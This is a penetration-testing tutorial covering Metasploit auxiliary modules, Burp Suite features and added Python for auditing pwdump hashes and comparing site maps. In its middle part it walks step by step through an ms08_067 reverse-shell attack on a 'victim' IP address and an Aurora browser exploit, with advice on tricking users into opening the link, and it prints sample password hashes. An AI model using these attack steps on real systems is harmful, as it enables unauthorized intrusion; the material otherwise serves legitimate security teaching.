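The hashdump lines above are in pwdump format (user:RID:LM hash:NT hash:::), and a defender reviewing such a dump of their own systems can read several weaknesses off it without cracking anything. The following Python is an added example, not code from the book or from Metasploit: it parses the dump, flags blank passwords (the well-known empty NT hash), accounts that still store an LM hash at all, passwords of seven characters or fewer (an empty second LM half), and NT hashes shared between accounts. The sample input is the hashdump output shown above.

```python
from dataclasses import dataclass

# Well-known constants: the LM hash of an empty 7-character half, the full LM hash of a
# blank/disabled password, and the NT hash of the empty string.
EMPTY_LM_HALF = "aad3b435b51404ee"
EMPTY_LM = EMPTY_LM_HALF * 2
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"


@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str


def parse_pwdump(text):
    """Parse hashdump output; skip blank and '[*]' progress lines, validate hash lengths."""
    accounts = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("[*]"):
            continue
        parts = line.split(":")
        if len(parts) < 4:
            raise ValueError(f"not a pwdump line: {line!r}")
        user, rid, lm, nt = parts[:4]
        lm, nt = lm.lower(), nt.lower()
        if len(lm) != 32 or len(nt) != 32:
            raise ValueError(f"bad hash length for {user!r}")
        accounts.append(Account(user, int(rid), lm, nt))
    return accounts


def audit(acct):
    """Return the weaknesses one stored credential reveals on inspection alone."""
    findings = []
    if acct.nt == EMPTY_NT:
        findings.append("blank password")
    if acct.lm != EMPTY_LM:
        # LM is case-insensitive, capped at 14 characters and split into two
        # independent 7-character halves, so its presence alone is a finding.
        findings.append("LM hash stored")
        if acct.lm[16:] == EMPTY_LM_HALF:
            findings.append("password is 7 characters or fewer")
    return findings


def shared_nt_hashes(accounts):
    """Map each NT hash used by more than one account to those users (password reuse)."""
    by_hash = {}
    for a in accounts:
        by_hash.setdefault(a.nt, []).append(a.user)
    return {h: users for h, users in by_hash.items() if len(users) > 1}


# Sample input: the six lines from the hashdump output shown above.
SAMPLE = """
[*] Dumping password hashes...
Administrator:500:b512c1f3a8c0e7241aa818381e4e751b:1891f4775f676d4d10c09c1225a5c0a3:::
dook:1004:81cbcef8a9af93bbaad3b435b51404ee:231cbdae13ed5abd30ac94ddeb3cf52d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:9cac9c4683494017a0f5cad22110dbdc:31dcf7f8f9a6b5f69b9fd01502e6261e:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:36547c5a8a3de7d422a026e51097ccc9:::
victim:1003:81cbcea8a9af93bbaad3b435b51404ee:561cbdae13ed5abd30aa94ddeb3cf52d:::
"""


def audit_report(text=SAMPLE):
    """Return {user: findings} for every account with at least one finding."""
    accounts = parse_pwdump(text)
    return {a.user: audit(a) for a in accounts if audit(a)}


if __name__ == "__main__":
    for user, findings in audit_report().items():
        print(f"{user}: {', '.join(findings)}")
    print("reused NT hashes:", shared_nt_hashes(parse_pwdump(SAMPLE)))
```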

So, if you have gone through the commands and their usage, you should now have
some understanding of the Metasploit framework.
You must be eager to exploit, but it is worth mentioning auxiliaries.
When most people think of Metasploit, exploits come to mind. Exploits are cool,
exploits get you shell, and exploits get all the attention. But sometimes you need
something more than that. By definition, a Metasploit module that is not an exploit
is an auxiliary module, which leaves a lot to the imagination.
In addition to providing valuable reconnaissance tools such as
port scanners and service fingerprinters, auxiliary modules such as
ssh_login can take a known list of usernames and passwords and
then attempt to log in via brute force across an entire target
network. Also included in the auxiliary modules are various
protocol fuzzers such as ftp_pre_post, http_get_uri_long, smtp_fuzzer,
ssh_version_corrupt, and more. You can launch these fuzzers at a target service in
hopes of finding your own vulnerabilities to exploit.

Just because auxiliary modules don't have a payload, don't think
you won't use them. But before we dive into their myriad uses,
here's an overview to help you see what we are dealing with.

There are many auxiliary modules, but we will try to help you understand
some basic ones; you are free to experiment with msfconsole
yourself, because the help is comprehensive.

Auxiliary modules are exciting because they can be used in so
many ways for so many things. If you can't find the perfect
auxiliary module, it's easy to modify one to suit your specific
needs.
Consider a common example. Say you are conducting a remote
penetration test, and upon scanning the network, you identify a
number of web servers and not much else. Your attack surface is
limited at this point, and you have to work with what is available
to you. Your auxiliary scanner/http modules will now prove
extremely helpful as you look for low-hanging fruit against which
you can launch an exploit. To search for all available HTTP
scanners, run 'search scanner/http' as shown here.

You can see immediately that there are modules that you can use
for subsequent exploration. Older versions of Microsoft IIS had a
vulnerability in their WebDAV implementations that allowed for
remote exploitation, so you could first run a scan against your
targets in hopes of finding a server with WebDAV enabled, as
follows.

See that the IP address marked 2 is vulnerable, so it can be
hacked. Cool, isn't it? So I think you have some idea about the
auxiliary modules.

__________________________________________________________________
It seems like you have some idea about how to use the exploits
and auxiliaries. Let's have a case study of attacking a system.
The materials have been copied from Metasploit Unleashed and
Metasploit: The Penetration Tester's Guide.

This is a case study about hacking a computer with just its IP address.

First open netdiscover to discover the machine to attack on your network. You can do this by just
running that command alone in a terminal, or get more detail and run it like this:
netdiscover -i eth0 -r 192.168.0.1/24

with output something like mine.

Now open up a Metasploit console by typing in the terminal:
msfconsole

Now we want to do a search for all exploits that have to do with netapi, so we run that search with the
command below:
search netapi

You'll want to run the exploit I highlighted in this screenshot:

exploit/windows/smb/ms08_067_netapi

Now type 'show options' to show all of the available options to set for this exploit:
show options

Now let's set our Remote Host (the machine we are attacking, the victim's PC):
set RHOST 192.168.0.101

Now we want to set the payload for the exploit by typing in the command below

set PAYLOAD windows/meterpreter/reverse_tcp

Now we need to set the local host, which would be our machine (the attacker's machine, i.e. you):
set LHOST 192.168.0.100

Last but not least we will type in the command below to begin exploiting the system
exploit

Now you can use Meterpreter; just look at the reference above.
This attack is possible if the firewall is disabled on an unpatched XP SP2 system.

Thanks to the guy called n1tr0g3n.

The Microsoft Internet Explorer Exploit

In 2010 major companies like Google, Adobe, Symantec, Juniper
Networks and others were attacked by an exploit called
Aurora. The Metasploit framework has an exploit that uses the same
technique as the famous Aurora and takes advantage of a memory
corruption flaw in Internet Explorer.
For this example we will test the exploit against a machine
running Windows XP in order to see how it affects Internet
Explorer 6. So we open the Metasploit framework and
search for ms10_002, the Aurora exploit.

Searching for the Aurora and use of the payload

For this attack, as you can see from the image above, we have
chosen the Meterpreter reverse TCP payload. Next it is time to
have a look at the available options of the exploit.

Analyzing the Options of Aurora Exploit

As we can see, the default setting for SRVHOST is 0.0.0.0: if we
choose to leave it like that, the web server will bind to all
interfaces. The next option is SRVPORT, which is the port that
the user needs to connect to in order to trigger the exploit. By
default the port is 8080, but we will use port 80 for this
example. We also have the option to set up the server
for SSL connections, but here we will not configure it. The next
setting is URIPATH, which is not enabled by default. URIPATH is
the URL that the victim will need to enter to trigger the
vulnerability. We can use a custom URL or we can set this to slash
(/).
For the payload settings we just need to configure the local port
and the listen address. For this scenario we have chosen port
443 and the IP address 192.168.1.1, which is our local address. The
next image shows the settings that we have made so far:

Setting the Aurora and the payload

Now that all the settings are correct, it is time to use the
command 'exploit' in order to run the exploit. We will notice that it
will start the web server on our local IP address. All we need now is
to send the URL (or the URI path, if you prefer) to our victims and to
wait for someone to connect. For this scenario we have set the URI
path as /, so this means it will be only our IP address.
From the moment that someone opens the link, the exploit will
start the heap spray. The Internet Explorer of the remote target
will not respond for a while and its memory usage will
increase dramatically, causing the system to act slowly.
The next image shows how the Aurora exploit opens a
Meterpreter session.

Running the Aurora Exploit

Now we have a Meterpreter shell on the remote machine and we
can start the session by using the command 'sessions -i 1'. However,
if the user closes the browser then we will lose our shell. In order
to avoid that we can type the command 'run migrate' in our Meterpreter
session and it will automatically migrate to
another process of the system, so we will keep our shell.

Starting the session and migration with another process

Additionally we can try to escalate privileges with the
command getsystem and we can see the running processes of the
remote system with the command ps.

Privilege Escalation

Getsystem can be used to get system privilege.

Affected versions
Internet Explorer 6
Microsoft claims that it is also possible to affect Internet Explorer
7 and 8, but nobody so far has seen this exploit work on these
versions.
Conclusion
This was a client-side attack with the use of the famous exploit
Aurora. Microsoft claims that it also affects Internet Explorer 7 and 8,
but from our testing against these versions we couldn't get a
shell.
The problem with this exploit is that it requires user
interaction in order to get a shell. The user must open an unknown
link that will come from an unknown user, so you need to
work out a method that will convince your targets. Also, if the
user closes the web browser then the shell is lost. This means that
we have to migrate the existing process to another process very
fast.

I will try to get deep into metasploit and its working in the
advanced sections.

Go to Offensive Security for Metasploit tutorials; the idea here was
to present the basic layout.
__________________________________________________________________

Chapter 3: Web Security: The Burp Suite and W3AF
What is Burp Suite?
Burp Suite is an integrated platform for attacking web applications. It contains a variety
of tools with numerous interfaces between them designed to facilitate and speed up the
process of attacking an application. All of the tools share the same robust framework
for handling and displaying HTTP messages, persistence, authentication, proxies,
logging, alerting and extensibility.
Burp Suite allows the individual tools to work together in highly effective ways, for
instance:

A central site map is used to aggregate information gathered about target
applications, and a centrally-defined target scope can be used to control the behaviour
of individual tools.

Any HTTP request and response processed by any of the Burp tools can be
selected for treatment by other tools. For example, a request from the Proxy history
can be sent to Intruder to form the basis of a custom automated attack, to Repeater for
a manual attack, to the Scanner for vulnerability analysis, or to Spider for automated
content discovery.

Applications can be "passively" spidered without generating huge numbers of
automated requests. All requests and responses passing through Burp Proxy are parsed
for links and forms, and the site map is updated accordingly, allowing you to map
sensitive applications in a non-intrusive manner, with full control over every request
that is made.

Requests passing through the Proxy can be automatically scanned for security
vulnerabilities while you are browsing (based on the defined target scope).

The IBurpExtender interface can be used to extend the functionality of Burp
Suite and individual tools. Data processed by one tool can be used in arbitrary ways to
affect the behaviour and results of other tools.

Burp Suite tools

Burp Suite contains the following tools:

Proxy - an intercepting HTTP/S proxy server which operates as a man-in-the-middle between the end browser and the target web application, allowing you to
intercept, inspect and modify the raw traffic passing in both directions.

Spider - an intelligent application-aware web spider which allows complete
enumeration of an application's content and functionality.

Scanner [Pro version only] - an advanced tool for performing automated
discovery of security vulnerabilities in web applications.

Intruder - a highly configurable tool for automating customised attacks against
web applications, such as enumerating identifiers, harvesting useful data, and fuzzing
for common vulnerabilities.

Repeater - a tool for manually manipulating and re-issuing individual HTTP
requests, and analysing the application's responses.

Sequencer - a tool for analysing the quality of randomness in an application's
session tokens or other important data items which are intended to be unpredictable.

Decoder - a tool for performing manual or intelligent decoding and encoding of
application data.

Comparer - a utility for performing a visual "diff" between any two items of
data, normally pairs of related requests and responses.
Detailed help specific to each of the individual Burp Suite tools is available in the Burp
documentation. The remainder of this section describes some typical usage scenarios for
Burp Suite and the shared functionality and configuration options that affect the
behaviour of all of the Burp tools.

Using Burp Suite

When Burp Suite is launched, Burp Proxy is started by default on port 8080 of the local
loopback interface. By setting a web browser to use this as its proxy server, all web
traffic can be intercepted, inspected and modified. By default, requests for non-media
resources are intercepted and displayed (this default behaviour can be modified using
options within Burp Proxy). All web traffic passing through Burp Proxy is by default
analysed and incorporated into the target site map, to build up a picture of the content
and functionality of the applications visited. In Burp Suite Professional, all requests are
by default passively analysed by Burp Scanner to identify a range of security
vulnerabilities.
Before you begin work in earnest, you should ideally define the target scope for your
work. The easiest way to do this is to browse to the application(s) you are targeting,
then locate the relevant hosts or directories within the site map, and use the context
menus to add URL paths to the scope. This central scope configuration can be used to
control the behaviour of the individual Burp tools in various ways.
As you browse the target application, you can intercept requests and responses in the
Proxy for manual editing, or you can turn interception off altogether. With interception
off, a full history is still maintained of each request and response, and content still
accumulates within the site map.

As well as modifying intercepted messages within the Proxy, you can send these to
other Burp tools to perform various actions, for example:

You can send requests to Repeater, to manually fine tune an attack against the
application, and reissue an individual request multiple times.

[Pro version] You can send requests to Scanner, to perform active or passive
vulnerability scanning.

You can send requests to Intruder, to launch a custom automated attack to
identify common vulnerabilities.

If you see a response containing a session token or other identifier that is
intended to be unpredictable, you can pass this to Sequencer to test the randomness of
the token.

Opaque data contained within any request or response can be sent to Decoder to
perform a smart decode and identify any hidden information.

[Pro version] You can use various engagement tools to make your work faster
and more effective.
You can also perform any of the above actions on items in the proxy history, on
individual hosts, directories or files within the target site map, or from anywhere within
any of the tools where requests and responses are displayed.
A central logging function can be used to record all requests and responses made by
individual tools, or the entire suite. The tools can run in a single tabbed window, or be
detached in individual windows. All tool and suite configuration is optionally persistent
across program loads. In Burp Suite Professional, you can save the entire state of the
component tools, to reload at a later stage and resume your work.

Burp menu
This menu contains a number of key functions and configuration options, which are
described below.

Search
[Pro version] Selecting "search" from the Burp menu opens a search dialog, which is
very easy to use. You can specify the following search parameters:

the expression to search for

whether the search is case sensitive

whether the search is simple text or regular expression

whether the search is restricted to in-scope items only

whether the search results should dynamically update as new HTTP messages
are processed

which locations to search within HTTP messages (requests vs. responses,
headers vs. body)

which tools to search in

When you click "go", the search begins, and the key details of each search match are
shown in a sortable table, with a preview pane where you can see the full request and
response, including highlighted matches for your search item. The usual context menus
can be used to initiate attacks against specific items, or send them to other tools for
further analysis:

Note that if you initiate a search via the context menu within the target site map (as
opposed to the Burp menu), then the search will be specific to the selected branch(es)
of the site map.

Saving and restoring state

[Pro version] The help below describes the process of saving and restoring state, and
some common usage scenarios for this functionality.

Saving state
The items that can be saved include:

The target site map, which includes all of the content discovered via the Proxy
and Spider.

The Proxy history.

The issues identified by the Scanner.

The contents and histories of the Repeater tabs.

The configuration of all suite tools.

Selecting "save state" from the Burp menu launches a wizard where you can define
which items you want to save the state and configuration of:

You then choose your output file, and Burp does the rest. You can continue using Burp
while its state is being saved - you may experience some brief delays if you try to
perform an operation on data which Burp is in the process of saving, to prevent any
data corruption.

Obviously, because the save file includes the requests and responses accumulated
within the tools you are saving, this file can grow very large. In practice, a few hours'
testing will typically save or restore in a minute or two. You can make this process
leaner and quicker by deleting unneeded items from the site map and proxy history
before performing a save.

Restoring state
Selecting "restore state" from the Burp menu launches a wizard where you can define
which items you want to restore the state and configuration of. The first step is to select
a file which you previously saved. Burp then analyses this file to identify all of its
contents (remember that each save file can include the state and configuration for any
combinations of tools). For each type of saved state and configuration, Burp lets you
choose whether you want to restore it, and if so whether to add to or replace the tool's
existing state:

Burp then goes to work and restores everything you have selected. You can continue
using Burp while its state is being restored - you may experience some brief delays if
you try to perform an operation on data which Burp is in the process of restoring, to
prevent any data corruption.

Usage scenarios
The ability to save and restore tool state and configuration is of huge benefit to
penetration testers:

You can save your work at the end of each day and seamlessly resume it the
next morning.

You can back up key test information throughout a job, in case of system
crashes.

At the end of an engagement, you can store a full archive of all accumulated
information, enabling you to re-open your work at a later point, to answer a client
question or re-test a fixed issue.

The task of mapping out an application's content can be divided up between
consultants, and the resulting site maps can be merged incrementally into one, for all
consultants to share.

Team leaders can optimise Burp's configuration for a particular engagement,
including fine-grained target scope definition, and pass this configuration straight to
other team members to begin testing.

You can create configuration templates designed for different kinds of task, save
these for future use, and switch between them easily.

Remembering settings
The "remember settings" options determine whether Burp Suite will remember
configuration settings across different loads of the software. You can tell Burp to
remember settings for all tools, or for individually selected tools.
The "restore defaults" options reset all configuration settings within Burp Suite or
individual tools to their default values.

Lean mode
If this option is selected, then the next time Burp Suite starts, it will run in a "lean"
mode in which the only tools available are Burp Proxy, Intruder and Repeater. Running
in this mode creates a smaller impact on system resources and is designed for users
who prefer a more simple lightweight tool.

Target site map

The central site map aggregates all of the information which Burp has gathered about
the application you are attacking. This includes all of the resources which have been
directly requested via the Proxy, any items which have been inferred by analysing the
responses to those requests, and all content discovered using the Spider. When you
begin browsing a typical application, a large amount of content will be mapped out for
you before you even get as far as requesting it, for example:

Items that have been requested are shown in black; those which Burp has inferred but
not yet requested are shown in grey. By default, items that are typically uninteresting
to penetration testers are filtered from the display, but this behaviour can be modified
(described below).
The site map interface works essentially like a graphical email client. A tree view of
hosts and directories is shown on the left. Selecting one or more nodes in the tree view
causes all of the items below these nodes to be shown in table form on the top right.
This table includes the key detail about each item (URL, status code, page title, etc.)
and allows the items to be sorted according to any column (click any column heading to
sort descending, or shift-click to sort ascending). Selecting an item in the table causes
the request and response for that item to show in a preview pane on the bottom right.
This preview pane contains all of the functions familiar from elsewhere in Burp: analysis
of headers and parameters, text search, media rendering, etc.
As well as displaying all of the information gathered about your target, the site map
enables you to control and initiate specific attacks against it, using the context menus
that appear everywhere. For example, you can select a host or folder within the tree
view, and perform actions on the entire branch of the tree, such as spidering or
scanning:

Similarly, you can select an individual file within the tree or table, and send the
associated request to other tools, such as Intruder or Repeater. If the item has not yet
been requested by your browser, Burp will construct a default request for the item,
based on the URL and any cookies received from the target domain:

[Pro version] You can use the context menu to access various engagement tools, such
as searching for comments and scripts, analysing your target web site, scheduling
tasks, etc.
In the table view, you can annotate individual or multiple items, by adding comments
and highlights:

You can highlight individual items using a drop-down menu on the left-most table
column:

And you can comment individual items in-place by double-clicking and editing the table
cell:

Alternatively, if you want to annotate several items at once, you select the relevant
items and use the context menu to add comments or apply highlights:

When you have annotated interesting requests, you can use column sorting and display
filters to quickly find these items later.

The content displayed within the site map is effectively a view into an underlying
database, and you can configure filters to determine which items of underlying data are
displayed within the map. Some applications contain a large amount of content like
images, CSS, etc., which it is normally helpful to hide from view. At the top of the site
map, there is a filter bar. Clicking on this shows a popup enabling you to configure
exactly what content will be displayed within the map:

You can choose to display only requests with parameters, or which are within the
current target scope. You can filter by MIME type, HTTP status code and file extension.
If you set a filter to hide some items, these are not deleted, only hidden, and will
reappear if you unset the relevant filter. This means you can use the filter to help you
systematically examine a complex site map to understand where different kinds of
interesting content reside.
[Pro version] You can also specify a search term to filter on, which will only show items
containing that expression in the request or response, or within the user-added
comment if applicable.
In addition to filtering content from view, you may sometimes want to delete it
altogether. For example, if you have browsed to off-target domains, you will have
accumulated data within Burp that you just don't need. In this situation, you can
permanently delete the superfluous items using the context menus within the site map.
For example, you can select multiple hosts or folders within the tree or table views and
delete them altogether:

Comparing site maps

You can use Burp to compare two site maps and highlight differences. This feature can
be used in various ways to help find different types of access control vulnerabilities, and
identify which areas of a large application warrant close manual inspection. Some
typical use-cases for this functionality are as follows:

You can map the application using accounts with different privilege levels, and
compare the results to identify functionality that is visible to one user but not the other.

You can map the application using a high-privileged account, and then re-request
the entire site map using a low-privileged account, to identify whether access to
privileged functions is properly controlled.

You can map the application using two different accounts of the same type, to
identify cases where user-specific identifiers are used to access sensitive resources, and
determine whether per-user data is properly segregated.
You can access the "compare site maps" feature using the context menu on the main
site map. This opens a wizard that lets you configure the details of the site maps you
want to compare, and how the comparison should be done. When selecting the site
maps you want to compare, the following options are available:

The current site map that appears in Burp's target tab.

A site map loaded from a Burp state file that you saved earlier.

Either of the above, re-requested in a different session context.

You can choose to include all of the site map's contents, or you can restrict only to
selected or in-scope items. If you choose to re-request a site map in a different session
context, it is particularly important not to include requests that might disrupt that
context - for example, login, logout, user impersonation functions, etc.
To perform the comparison, Burp works through each request in the first site map, and
matches this with a request in the second site map, and vice versa. The responses to
matched requests are then compared to identify any differences. Any unmatched items
in either site map are flagged as deleted or added, respectively. The exact process by
which this is done is highly configurable, allowing you to tailor the comparison to
features of the target application.
The options for configuring how Burp matches requests in the two site maps are shown
below:

The default options shown will work well in most situations, and match requests based
on URL file path, HTTP method and the names of parameters in the query string and
message body. For some applications, you will need to modify these options to ensure
that requests are correctly matched. For example, if an application uses the same base
URL for various different actions, and specifies the action using the values of query
string parameters, you will need to match requests on the values of these parameters
as well as their names.

The options for configuring how Burp compares the responses to matched requests are
shown below:

Again, the default options will work in most situations. These options ignore various
common HTTP headers and form fields that have ephemeral values, and also ignore
whitespace-only variations in responses. The default options are designed to reduce the
noise generated by inconsequential variations in responses, allowing you to focus
attention on differences that are more likely to matter.
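The matching and comparison steps described above, as an added worked example that is not Burp's own code: requests pair on method, URL path and parameter names (optionally values), ephemeral headers and whitespace-only variation are ignored, and the "diff count" is a token-level edit distance. The `Item` structure, the set of ignored headers, the `page` helper and the admin/user sample maps are constructed here for illustration.

```python
"""Site-map comparison as the text describes it (added illustration, not Burp's
code): requests pair on method, path and parameter names (optionally values);
paired responses are compared with ephemeral headers dropped and whitespace
collapsed; the 'diff count' is a token-level edit distance."""
from dataclasses import dataclass, field
from typing import Dict, List, Tuple
from urllib.parse import parse_qsl, urlsplit


@dataclass
class Item:
    method: str                          # one site-map entry: request + response
    url: str
    body: str = ""                       # form-encoded request body, if any
    status: int = 200
    headers: Dict[str, str] = field(default_factory=dict)
    response_body: str = ""


# Headers whose values differ between otherwise identical responses (assumed set).
EPHEMERAL_HEADERS = {"date", "set-cookie", "expires", "etag", "last-modified",
                     "content-length"}


def match_key(item: Item, match_param_values: bool = False) -> Tuple:
    """Key used to pair a request in one map with a request in the other."""
    parts = urlsplit(item.url)
    params = (parse_qsl(parts.query, keep_blank_values=True)
              + parse_qsl(item.body, keep_blank_values=True))
    if match_param_values:
        return (item.method.upper(), parts.path, tuple(sorted(params)))
    return (item.method.upper(), parts.path, tuple(sorted(n for n, _ in params)))


def normalise_response(item: Item) -> List[str]:
    """Status, kept headers and body as tokens; whitespace-only changes vanish."""
    tokens = [str(item.status)]
    for name, value in sorted((k.lower(), v) for k, v in item.headers.items()):
        if name not in EPHEMERAL_HEADERS:
            tokens.append(f"{name}:{value}")
    return tokens + item.response_body.split()


def edit_distance(a: List[str], b: List[str]) -> int:
    """Token-level Levenshtein distance: the 'diff count' column."""
    prev = list(range(len(b) + 1))
    for i, ta in enumerate(a, 1):
        cur = [i]
        for j, tb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ta != tb)))
        prev = cur
    return prev[-1]


def compare_site_maps(first: List[Item], second: List[Item],
                      match_param_values: bool = False) -> Dict[str, list]:
    """Classify each request as unchanged, modified (url, diff count), deleted
    (only in first) or added (only in second). Requests sharing a key within one
    map pair up in order; if an application selects the action by parameter
    value, pass match_param_values=True so they do not collide."""
    def index(items: List[Item]) -> Dict[Tuple, List[Item]]:
        groups: Dict[Tuple, List[Item]] = {}
        for item in items:
            groups.setdefault(match_key(item, match_param_values), []).append(item)
        return groups

    a, b = index(first), index(second)
    result: Dict[str, list] = {"unchanged": [], "modified": [], "deleted": [], "added": []}
    for key, group in a.items():
        partners = b.get(key, [])
        for i, item in enumerate(group):
            if i >= len(partners):
                result["deleted"].append(item.url)
                continue
            count = edit_distance(normalise_response(item), normalise_response(partners[i]))
            if count == 0:
                result["unchanged"].append(item.url)
            else:
                result["modified"].append((item.url, count))
    for key, group in b.items():
        result["added"].extend(item.url for item in group[len(a.get(key, [])):])
    return result


# Constructed sample data: the application mapped as an administrator, then the
# same requests re-issued in an ordinary user's session, as in the text.
BASE = "https://www.myapp.com"


def page(url: str, html: str, status: int = 200, date: str = "Mon, 02 Jan 2012 10:00:00 GMT") -> Item:
    return Item("GET", url, status=status, response_body=html,
                headers={"Content-Type": "text/html", "Date": date})


ADMIN_MAP = [
    page(BASE + "/home", '<h1>Welcome admin</h1>\n<a href="/admin">Admin</a>'),
    page(BASE + "/admin", "<ul><li>List users</li><li>Settings</li></ul>"),
    page(BASE + "/admin/listUsers", "<table>\n  <tr><td>alice</td></tr>\n</table>"),
]
LATER = "Mon, 02 Jan 2012 10:05:00 GMT"
USER_MAP = [
    page(BASE + "/home", "<h1>Welcome bob</h1>", date=LATER),
    page(BASE + "/admin", "Not authorised", status=401, date=LATER),
    page(BASE + "/admin/listUsers", "<table> <tr><td>alice</td></tr> </table>", date=LATER),
]
```

`compare_site_maps(ADMIN_MAP, USER_MAP)` reports /home and /admin as modified and /admin/listUsers as unchanged despite differing Date headers and whitespace; that unchanged admin function is exactly the item the text says a tester must then examine by hand.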
The results of a simple site map comparison are shown below. This shows an
application that has been mapped out with administrative privileges, and the resulting
site map re-requested with user-level privileges. The results contain a colourised
analysis of the differences between the site maps, and show items that have been
added, deleted or modified between the two maps. (In this case, since the whole of the
first site map was re-requested, there are no added or deleted items in the maps
themselves.) For modified items, the table includes a diff count column, which is the
number of edits required to modify the item in the first map into the item in the second
map. When you select an item, the corresponding item in the other site map is also
selected, and each response is highlighted to show the locations of the differences:

Interpreting the results of the site map comparison requires human intelligence, and an
understanding of the meaning and context of specific application functions. For
example, the screenshot above shows the responses that are returned to each user
when they view their home page. The two responses show a different description of the
logged-in user, and the administrative user has an additional menu item. These
differences are to be expected, and they are neutral as to the effectiveness of the
application's access controls, since they only concern the user interface.
The screenshot below shows the response returned when each user requests the
top-level admin page. Here, the administrative user sees a menu of available options,
while the ordinary user sees a "not authorised" message. These differences indicate that
access controls are being correctly applied:

The screenshot below shows the response returned when each user requests the list
users admin function. Here, the responses are identical, indicating that the application
is vulnerable, since the ordinary user should not have access to this function and does
not have any link to it in their user interface:

As this example shows, simply exploring the site map tree and looking at the number of
differences between items is not sufficient to evaluate the effectiveness of an
application's access controls. Two identical responses may indicate a vulnerability (for
example, in an administrative function that discloses sensitive information), or may be
harmless (for example, in an unprotected search function). Conversely, two different
responses may still mean that a vulnerability exists (for example, in an administrative
function that returns different content each time it is accessed), or may be harmless
(for example, in a page showing profile information about the currently logged-in user).
All of these scenarios may coexist even in the same application. This is why fully
automated tools are so ineffective at identifying access control vulnerabilities.
So Burp does not relieve you of the task of closely examining the application's
functionality, and evaluating whether access controls are being properly applied in each
case. What the site map comparison feature does is to automate as much of the
process as possible, giving you all the information you need in a clear form, and letting
you apply your knowledge of the application's functionality to identify any actual
vulnerabilities.

Target scope
The "scope" tab lets you tell Burp, at a Suite-wide level, exactly what hosts and URLs
constitute the target for your current work. You can think of the target scope as,
roughly, the items which you are currently interested in and willing to attack.
The target scope can affect the behaviour of the individual Burp tools in numerous
ways, for example:

You can set display filters to show only in-scope items.

You can tell the Proxy to intercept only in-scope requests and responses.

The Spider will only follow links that are in scope.

In Burp Suite Professional, you can automatically initiate vulnerability scans of
in-scope items.

You can configure Intruder and Repeater to follow redirects to any in-scope
URLs.
By telling Burp what your current target is, you can ensure that Burp carries out
numerous such actions in an appropriate way, only going after items that you are
interested in and willing to attack. In all cases, you can additionally fine tune the target
scope and the associated behaviour at the level of individual tools, giving you
fine-grained control over everything that Burp does, if you need it. However, the Suite-wide
scope definition provides a quick and easy way to tell Burp what is fair game and what
is off limits, and is almost always worth configuring before you begin your work in
earnest.
The configuration of target scope is very powerful, but also very easy. The UI in the
"scope" tab lets you define rules for what is included within, or excluded from, the
target scope. For each rule, you can define the following fields:

Protocol - HTTP, HTTPS, or either.

Host - this can be either a regular expression to match the hostname, or an IP
range in various standard formats, for example 10.1.1.1/24 or 10.1.1-20.1-127. If the
host field is left blank, then the rule can match requests to any host.

Port - this is a regular expression to match the port number. If the port field is
left blank, then the rule can match requests to any port.

File - this is a regular expression to match the file portion of the URL. If the file
field is left blank, then the rule can match requests for any file.
When Burp evaluates a URL to decide if it is within the target scope, it will be deemed
to be in scope if the URL matches at least one "include" rule and does not match any
"exclude" rules. This enables you to define specific hosts and directories as being
generally within scope, and yet exclude from that scope specific subdirectories or files.
For example, the target scope defined below will match any content within
https://www.myapp.com and https://staging.myapp.com with the exception of content
below https://www.myapp.com/admin and any URL containing the expression "logout":
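The include/exclude evaluation just described, as an added worked example that is not Burp's own code: a URL is in scope when at least one include rule matches and no exclude rule does. The `ScopeRule` model, the use of Python regular expressions for the host, port and file fields, and the CIDR handling for IP-range hosts are assumptions made here; the dashed range syntax mentioned in the text is not implemented.

```python
"""Burp-style target scope evaluation: an added illustration, not Burp's own
code. A URL is in scope when it matches at least one include rule and no
exclude rule; each rule carries the four fields of the scope tab."""
import ipaddress
import re
from dataclasses import dataclass
from typing import Optional, Sequence
from urllib.parse import urlsplit


@dataclass(frozen=True)
class ScopeRule:
    protocol: Optional[str] = None  # "http", "https" or None for either
    host: Optional[str] = None      # regex on the hostname, or a CIDR range such as
                                    # 10.1.1.0/24 (dashed ranges are not implemented here)
    port: Optional[str] = None      # regex on the port number; None matches any port
    file: Optional[str] = None      # regex on the path (+ query); None matches any file

    def _host_matches(self, hostname: str) -> bool:
        if self.host is None:
            return True
        try:
            network = ipaddress.ip_network(self.host, strict=False)
        except ValueError:                   # not a CIDR range: treat it as a regex
            return re.search(self.host, hostname) is not None
        try:
            return ipaddress.ip_address(hostname) in network
        except ValueError:                   # CIDR rule, but the URL names a host
            return False

    def matches(self, url: str) -> bool:
        parts = urlsplit(url)
        scheme = parts.scheme.lower()
        if self.protocol is not None and scheme != self.protocol.lower():
            return False
        if not self._host_matches(parts.hostname or ""):
            return False
        port = parts.port if parts.port is not None else (443 if scheme == "https" else 80)
        if self.port is not None and re.search(self.port, str(port)) is None:
            return False
        path = parts.path or "/"
        if parts.query:
            path += "?" + parts.query
        return self.file is None or re.search(self.file, path) is not None


def in_scope(url: str, include: Sequence[ScopeRule], exclude: Sequence[ScopeRule]) -> bool:
    """In scope = at least one include rule matches and no exclude rule does."""
    return (any(rule.matches(url) for rule in include)
            and not any(rule.matches(url) for rule in exclude))


# The scope from the example in the text: everything on the two hosts over HTTPS,
# except content below /admin on www and any URL containing "logout". The host
# regexes are anchored so that, say, www.myapp.com.example.net is not swept in.
INCLUDE = [
    ScopeRule(protocol="https", host=r"^www\.myapp\.com$"),
    ScopeRule(protocol="https", host=r"^staging\.myapp\.com$"),
]
EXCLUDE = [
    ScopeRule(protocol="https", host=r"^www\.myapp\.com$", file=r"^/admin(/|$)"),
    ScopeRule(file=r"logout"),
]

if __name__ == "__main__":
    for url in ("https://www.myapp.com/index.jsp", "https://www.myapp.com/admin/users",
                "https://staging.myapp.com/account/logout", "http://www.myapp.com/"):
        print(url, in_scope(url, INCLUDE, EXCLUDE))
```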

Configuring scope rules directly as described above is somewhat unfriendly for many
users. A much easier approach is to let Burp define the rules for you based on intuitive
instructions which you give it using the context menus in the site map or elsewhere.
Before you begin testing the application, you simply need to browse to the relevant
content so that it appears in the site map. You can then select one or more hosts and
folders, and use the context menu to include or exclude these from the scope. This

process is extremely easy and in most situations will let you quickly define all of the
rules necessary for your testing:

Suite options
